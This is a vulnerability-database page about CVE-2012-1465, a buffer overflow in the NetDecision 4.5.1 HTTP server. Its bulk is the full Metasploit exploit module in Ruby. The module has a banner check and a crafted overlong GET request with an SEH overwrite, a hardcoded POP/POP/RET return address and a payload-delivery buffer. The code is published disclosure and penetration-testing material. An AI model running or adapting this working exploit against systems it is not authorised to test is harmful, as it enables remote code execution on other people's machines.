Lucene search
+L

NetDecision 4.5.1 HTTP Server Buffer Overflow

🗓️ 14 Mar 2012 10:13:22Reported by Prabhu S Angadi, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 44 Views

NetDecision 4.5.1 HTTP Server Buffer Overflow vulnerability in C:\Program Files\NetDecision\Bin\HttpSvr.exe allows remote code execution by supplying a long URL string to the HTTP service

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2012-1465
19 Mar 201219:55
attackerkb
Circl
CVE-2012-1465
29 Feb 201200:00
circl
CVE
CVE-2012-1465
19 Mar 201219:00
cve
Cvelist
CVE-2012-1465
19 Mar 201219:00
cvelist
Metasploit
NetDecision NOCVision Server Directory Traversal
14 Mar 201221:50
metasploit
NVD
CVE-2012-1465
19 Mar 201219:55
nvd
OpenVAS
NetDecision HTTP Server Long HTTP Request Remote DoS Vulnerability
8 Mar 201200:00
openvas
Packet Storm
NetDecision NOCVision Server Directory Traversal
1 Sep 202400:00
packetstorm
Prion
Stack overflow
19 Mar 201219:55
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "NetDecision 4.5.1 HTTP Server Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in NetDecision's HTTP service
        (located in C:\Program Files\NetDecision\Bin\HttpSvr.exe).  By supplying a
        long string of data to the URL, an overflow may occur if the data gets handled
        by HTTP Server's active window.  In other words, in order to gain remote code
        execution, the victim is probably looking at HttpSvr's window.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Prabhu S Angadi',  #Discovery, DoS PoC
          'sinn3r'            #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2012-1465'],
          ['OSVDB', '79651'],
          ['URL', 'http://web.archive.org/web/20121024124508/http://secunia.com/advisories/48168/'],
          ['URL', 'http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x09\x0a\x0d\x20\x25\x26\x27\x3f",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => "seh",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'NetDecision 4.5.1 on XP SP3',
            {
              # POP/POP/RET - OLEACC.dll
              'Ret'    => 0x74C869E2,
              'Offset' => 1620
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-02-24',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi({'uri'=>'/'})
    banner = res.headers['Server']
    if banner =~ /NetDecision\-HTTP\-Server\/1\.0/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    buf = "/"
    buf << rand_text_alpha(675, payload_badchars)
    buf << pattern_create(5) #Avoid TerminateProcess()
    buf << rand_text_alpha(target['Offset']-buf.length, payload_badchars)
    buf << "\xeb\x06" + rand_text_alpha(2, payload_badchars)
    buf << [target.ret].pack('V*')
    buf << payload.encoded
    buf << rand_text_alpha(8000-buf.length, payload_badchars)

    print_status("#{rhost}:#{rport} - Sending #{self.name}...")

    send_request_raw({
      'method' => 'GET',
      'uri'    => buf
    })

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation